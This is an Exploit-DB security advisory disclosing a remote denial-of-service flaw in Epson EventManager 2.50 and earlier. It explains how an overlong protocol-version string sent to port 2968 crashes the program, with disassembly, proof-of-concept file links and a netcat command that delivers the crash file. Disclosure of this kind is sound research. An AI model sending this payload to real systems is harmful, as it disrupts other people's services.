Epson EventManager 2.50 - Denial of Service

EDB-ID:

18602

CVE:



Platform:

Windows

Published:

2012-03-14

#######################################################################

                             Luigi Auriemma

Application:  Epson EventManager
              http://www.epson.com
Versions:     <= 2.50
Platforms:    Windows
Bug:          Denial of Service
Exploitation: remote
Date:         14 Mar 2012
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


Epson EventManager is a program started when the computer starts and
listens on port 2968 ("Network Scan" enabled by default), it allows to
automate some actions of the Epson scanners (like the scan&save button)
through the PushScan protocol.


#######################################################################

======
2) Bug
======


The secure strncpy function that copies the "x-protocol-version" string
in a 7 bytes buffer can be forced to (auto)terminate the program if
it's longer than that size and starts with "1.":

  0163967F  |> 53             PUSH EBX
  01639680  |. 8B5C24 24      MOV EBX,DWORD PTR SS:[ESP+24]
  01639684  |. 53             PUSH EBX
  01639685  |. 50             PUSH EAX
  01639686  |. E8 25F8FFFF    CALL epnsm.01638EB0   ; parse "x-protocol-version" string
  0163968B  |. 83C4 08        ADD ESP,8
  0163968E  |. 83F8 01        CMP EAX,1
  01639691  |. 0F85 FC000000  JNZ epnsm.01639793    ; version 1
  01639697  |. 8B4C24 2C      MOV ECX,DWORD PTR SS:[ESP+2C]
  0163969B  |. 8B5424 0C      MOV EDX,DWORD PTR SS:[ESP+C]
  0163969F  |. 6A 06          PUSH 6
  016396A1  |. 33C0           XOR EAX,EAX
  016396A3  |. 52             PUSH EDX
  016396A4  |. 8901           MOV DWORD PTR DS:[ECX],EAX
  016396A6  |. 51             PUSH ECX
  016396A7  |. 66:8941 04     MOV WORD PTR DS:[ECX+4],AX
  016396AB  |. E8 D0B5FFFF    CALL epnsm.01634C80   ; secure strncpy


#######################################################################

===========
3) The Code
===========


http://aluigi.org/poc/eeventmanager_1.dat
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18602.dat

  nc SERVER 2968 < eeventmanager_1.dat


#######################################################################

======
4) Fix
======


No fix.


#######################################################################